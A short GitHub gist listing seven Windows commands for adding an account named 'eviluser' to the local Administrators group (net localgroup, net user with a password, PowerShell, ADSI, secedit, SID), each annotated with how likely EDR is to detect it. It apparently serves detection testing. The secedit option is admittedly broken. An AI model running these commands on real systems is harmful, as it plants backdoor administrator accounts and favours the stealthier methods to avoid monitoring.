Skip to content

Instantly share code, notes, and snippets.

@justaguywhocodes

justaguywhocodes/gist:10474ced3b773bf2409397f078d77bec

Created November 25, 2025 16:57
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save justaguywhocodes/10474ced3b773bf2409397f078d77bec to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save justaguywhocodes/10474ced3b773bf2409397f078d77bec to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.txt
ommands to Execute (from a standard user or attacker context)Option 1: Using net localgroup (most common, loudest, almost always detected by modern EDR)cmd
net localgroup Administrators eviluser /add
Option 2: Using net.exe with domain account (if testing domain user to local admin)cmd
net localgroup Administrators "DOMAIN\eviluser" /add
Option 3: Using PowerShell Add-LocalGroupMember (very common in modern attacks)powershell
Add-LocalGroupMember -Group "Administrators" -Member "eviluser"
Option 4: Using net user + net localgroup (create + add in one go)cmd
net user eviluser P@ssw0rd123! /add
net localgroup Administrators eviluser /add
Option 5: Quiet method via WMI (sometimes evades basic logging)powershell
([ADSI]"WinNT://./Administrators,group").Add("WinNT://$env:USERDOMAIN/eviluser,user")
Option 6: Using secedit to export/modify/re-import (rarely detected by some EDRs)cmd
secedit /export /cfg secpol.cfg
(type secpol.cfg) > secpol_new.cfg
echo [Privilege Rights] >> secpol_new.cfg
echo SeMachineAccountPrivilege = *S-1-5-32-544 >> secpol_new.cfg (not directly relevant but shows tampering)
REM Actually modifying local group via secedit is complex; usually not used for this.
Option 7: Using Add-LocalGroupMember with SID (slightly more stealthy)powershell
Add-LocalGroupMember -SID "S-1-5-32-544" -Member "eviluser"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment